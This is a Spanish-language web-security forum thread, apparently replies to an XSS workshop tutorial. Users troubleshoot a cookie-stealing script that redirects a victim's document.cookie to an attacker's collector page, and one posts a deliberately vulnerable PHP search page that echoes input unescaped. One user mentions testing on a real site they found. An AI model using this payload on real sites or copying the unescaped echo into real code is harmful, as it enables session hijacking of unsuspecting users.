Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Taller de Seguridad Web #1

  • 36 Respuestas
  • 32707 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado neoxalber

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #20 en: Junio 14, 2015, 08:26:03 pm »
una duda por que al inyectar el codigo para robar cookies no me aprecen las cookies solo esto url/hacking/undercode/xss/visitas/cookies.php?cookie=(aqui no aparece nada)  espero y me puedan ayudar de antemano gracias  ;D

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5487
  • Actividad:
    23.33%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #21 en: Junio 14, 2015, 09:07:03 pm »
@neoxalber podrías dar un poco mas de detalles? no alcancé a entenderte bien

Saludos!
ANTRAX


Desconectado neoxalber

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #22 en: Junio 14, 2015, 09:26:26 pm »
bueno lo que pasa es que al momento de hacer pruebas de robo de cookies e inyectar  el codigo que dejaron (<script>window.location='http://localhost/xss/cookies.php?cookie='+document.cookie;</script>) claro con la url mia donde esta alojado el .php solo queda asi  url/hacking/undercode/xss/visitas/cookies.php?cookie= en donde deberia arrojar las cookies solo esta en blanco(vi que debe de aparecer algo parecido a esto PHPSESSID=) ese espacio queda en blanco, las pruebas las hice con el index.php y el enviar.php que dejadon las subi tanto a mi servidor local y a un hosting pero solo se queda asi , crei que era la vercion de navegador y lo probe en el movil y quedo igual , disculpa por no tener un lenguaje amplio  en este tema , soy algo nuevo gracias :)

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5487
  • Actividad:
    23.33%
  • Reputación 35
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #23 en: Junio 14, 2015, 09:58:52 pm »
Proba poniendo esto asi:

<script>alert(document.cookie)</script>

Eso debería mostrarte la cookie en un alert y ahi te fijas si verdaderamente aparece algo en blanco


Desconectado bernatixer

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Not yet
    • Ver Perfil
    • bernatixer
  • Skype: bernat.torres.bellido
  • Twitter: BernatTorres
« Respuesta #24 en: Enero 02, 2016, 09:24:34 am »
Muy bien escrito y fácil de entender, gracias por el aporte!

Desconectado inigomad

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #25 en: Febrero 29, 2016, 07:06:53 am »
Buenas. Tengo una duda con el taller, que por cierto me parece que está genial. Para robar la cookie se usa la página vulnerable message.php que es bastante más compleja que la que se propone para crear comentarios (index.php). ¿Está el código de esa página message.php accesible en algún lugar? Supongo que habrá una gestión de usuarios y creación de la cookie a robar.

Gracias y muy buen trabajo!

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1921
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #26 en: Febrero 29, 2016, 07:53:24 am »
Buenas. Tengo una duda con el taller, que por cierto me parece que está genial. Para robar la cookie se usa la página vulnerable message.php que es bastante más compleja que la que se propone para crear comentarios (index.php). ¿Está el código de esa página message.php accesible en algún lugar? Supongo que habrá una gestión de usuarios y creación de la cookie a robar.

Gracias y muy buen trabajo!

La página message.php no es vulnerable, la que es vulnerable (ya que no filtra el XSS), es el index.php (la que muestra los mensajes).

La web que se utiliza es el típico libro de visitas.

Saludos.



Desconectado inigomad

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #27 en: Febrero 29, 2016, 08:33:29 am »
Pero entonces no hay cookie que secuestrar. Index.php no genera ninguna cookie, ni se administra usuarios, al usar cookie.php meterá un valor en blanco.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1921
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #28 en: Marzo 01, 2016, 06:24:17 am »
Pero entonces no hay cookie que secuestrar. Index.php no genera ninguna cookie, ni se administra usuarios, al usar cookie.php meterá un valor en blanco.

Existe la cookie de la sesión.

Saludos.



Desconectado Voodoo2k

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #29 en: Febrero 13, 2017, 11:44:20 pm »
A ver. Estoy intentando capturar la Cookie del administrador.... ya tengo subido los dos archivos: cookie.php y cookies.txt , para eso creé un directorio en la raíz del host llamada XSS para hacer exactamente lo mismo que se hace en el tutorial ... ahora pongo el script exactamente así: <script>window.location='https://dominio/xss/cookies.php?cookie='+document.cookie;</script> ... pero no me captura nada ... cual podría ser mi error?. Veo que efectivamente cuando inyecto el script me redirige al archivo cookie.php en el host. Pero al ver el archivo cookies.txt no hay nada.

Desconectado Riojas

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 4
  • -RIOJAS
    • Ver Perfil
    • Arduino Center
    • Email
« Respuesta #30 en: Febrero 14, 2017, 06:53:06 pm »
Tengo el mismo problema.
Estoy trabajando en un servidor gratuito y al poner el <script>alert(document.cookie);</script> me aparece en blanco.
Pero al ponerlo en una pagina vulnerable que encontré si me muestra la información.
Ayuda porfavor!!

Desconectado The Smiley Man

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
    • Email
« Respuesta #31 en: Febrero 14, 2017, 06:59:26 pm »
Tengo el mismo problema.
Estoy trabajando en un servidor gratuito y al poner el <script>alert(document.cookie);</script> me aparece en blanco.
Pero al ponerlo en una pagina vulnerable que encontré si me muestra la información.
Ayuda porfavor!!

Eso me paso al principio pero repase el codigo y re-escribi los "" ' etc. asi se me soluciono.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #32 en: Febrero 14, 2017, 07:32:26 pm »
He visto que varias personas tenía problemas con el código del buscador.php
Lo he modificado y ahora sí debería de funcionar.

Saludos.

Desconectado gabe56

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #33 en: Febrero 14, 2017, 07:59:24 pm »
A ver. Estoy intentando capturar la Cookie del administrador.... ya tengo subido los dos archivos: cookie.php y cookies.txt , para eso creé un directorio en la raíz del host llamada XSS para hacer exactamente lo mismo que se hace en el tutorial ... ahora pongo el script exactamente así: <script>window.location='https://dominio/xss/cookies.php?cookie='+document.cookie;</script> ... pero no me captura nada ... cual podría ser mi error?. Veo que efectivamente cuando inyecto el script me redirige al archivo cookie.php en el host. Pero al ver el archivo cookies.txt no hay nada.

Hola chicos, tengo el mismo problema que Voodo2k. ¿Cual sería la solución a esto?. Gracias, un abrazo.
En constante aprendizaje.

Desconectado Güez

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • Email
« Respuesta #34 en: Febrero 14, 2017, 09:52:36 pm »
Hay un error en el codigo de "buscador.php"
En la linea 9 y 12, las comillas dobles del "buscar" deben reemplazarse por unas comillas simples '.
De manera que quede asi :
Código: [Seleccionar]
<html>
        <head>
                <title>Resultado de la busqueda</title>
        </head>
        <body>
<center>
                        <img src="logo.png">
                        <?php
                        
if(isset($_GET['buscar']))
                {
                  
$busqueda$_GET['buscar'];
                echo 
"<p align='center'>No se ha encontrado ningun resultado que contenga:" $busqueda "</p>";       
                }
                
?>

                </center>       
</body>
</html>


Desconectado broxxsm

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #35 en: Febrero 15, 2017, 04:42:59 pm »
Buenas, gran taller amigo me acabo de enterar por el grupo ya que no me di cuenta de los talleres, aun que en la primera parte del tuto me aparecio un error de php en el buscador.php en la linea 9 exactamente, yo lo solucione cambiando las dos comillas que tenia a una solo y me dejo seguir por si alguien le paso. saludos!

Desconectado jfcasillasl

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #36 en: Agosto 20, 2018, 10:26:45 am »
Me ha gustado mucho y es ideal para mi como docente este tutorial,espero y pronto hagan una continuación de este taller, saludos

 

¿Te gustó el post? COMPARTILO!



Taller de pentesting con Kali Linux - Parte I

Iniciado por ANTRAX

Respuestas: 57
Vistas: 49694
Último mensaje Octubre 26, 2018, 11:01:57 am
por octopus
Taller de Pentesting con Kali Linux #2

Iniciado por ANTRAX

Respuestas: 32
Vistas: 30905
Último mensaje Noviembre 10, 2017, 07:40:18 am
por Brittsman97
Taller de Programacion en Batch #2

Iniciado por ANTRAX

Respuestas: 9
Vistas: 10578
Último mensaje Junio 03, 2015, 11:08:02 am
por ShineW
Taller de Programacion en Android #1

Iniciado por ANTRAX

Respuestas: 16
Vistas: 14042
Último mensaje Septiembre 27, 2015, 05:55:57 pm
por www
Taller Programación en Batch #1

Iniciado por ANTRAX

Respuestas: 5
Vistas: 13246
Último mensaje Octubre 21, 2014, 04:53:53 pm
por drotha2